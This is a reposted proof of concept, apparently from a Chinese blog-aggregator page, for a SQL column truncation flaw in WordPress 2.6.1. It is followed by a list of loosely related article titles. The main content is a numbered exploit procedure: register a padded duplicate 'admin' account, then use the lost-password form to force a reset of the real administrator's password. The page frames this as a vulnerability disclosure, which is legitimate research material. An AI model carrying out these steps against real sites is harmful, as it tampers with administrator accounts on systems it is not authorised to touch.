WordPress 2.6.1 SQL Column Truncation Vulnerability分析
来源:互联网 发布:ppt 数据计算展示图 编辑:程序博客网 时间:2024/06/03 20:16
# WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)
#
# found by irk4z[at]yahoo.pl
# homepage: http://irk4z.wordpress.com/
#
# this is not critical vuln [;
#
# first, read this discovery:
# http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/
#
# in this hack we can remote change admin password, if registration enabled
#
# greets: Stefan Esser, Lukasz Pilorz, cOndemned, tbh, sid.psycho, str0ke and all fiends
1. go to url: server.com/wp-login.php?action=register
2. register as:
login: admin x
email: your email^ admin[55 space chars]x
now, we have duplicated 'admin' account in database
3. go to url: server.com/wp-login.php?action=lostpassword
4. write your email into field and submit this form
5. check your email and go to reset confirmation link
6. admin's password changed, but new password will be send to correct admin email ;/
- WordPress 2.6.1 SQL Column Truncation Vulnerability分析
- SQL Column Truncation Vulnerabilities
- MySQL SQL Column Truncation
- Mysql charset Truncation vulnerability
- Mysql charset Truncation vulnerability
- java.sql.BatchUpdateException: Data truncation: Data too long for column 'site_name' at row 1
- Caused by: java.sql.BatchUpdateException: Data truncation: Data too long for column 'cont' at row 1
- Caused by: java.sql.BatchUpdateException: Data truncation: Data too long for column 'JLFSM' at row 1
- java.sql.BatchUpdateException: Data truncation: Data too long for column
- 错误:SQL Error: 1406, SQLState: 22001____Data truncation: Data too long for column 'add_user' at row 1
- 报错Java.sql.SQLException: Data truncation: Data too long for column 'content' at row 1 Query
- Data truncation: Data truncated for column 'content' at row 1
- Data truncation: Data truncated for column 'xxxxxxxxx' at row 1
- JBPM java.sql.BatchUpdateException: Data truncation: Incorrect datetime value: '' for column 'START_
- Data truncation: Data too long for column 'name' at row 1的处理
- com.mysql.jdbc.MysqlDataTruncation: Data truncation: Data too long for column 'title' at row 1
- com.mysql.jdbc.MysqlDataTruncation: Data truncation: Data too long for column 'title' at row 1
- Data truncation: Data too long for column 'name' at row 1
- 自定义优先队列和操作符重载问题
- OpenCV学习笔记(一)概述和系统配置
- (转载)在MFC扩展DLL中输出对话框
- Embed Object大部分的属性及参数详解
- 开篇
- WordPress 2.6.1 SQL Column Truncation Vulnerability分析
- 各种数据库连接
- Google的博客blogspot.com窃取cookie漏洞
- Oblog最新注入漏洞分析
- Discuz!!论坛wap功能模块编码的注射漏洞分析
- 对Extmail安全漏洞的分析
- 暴风影音视频加速程序模块缓冲区溢出漏洞的分析
- 配置eclipse的艰难路程
- C/C++中字符指针数组及指向指针的指针的含义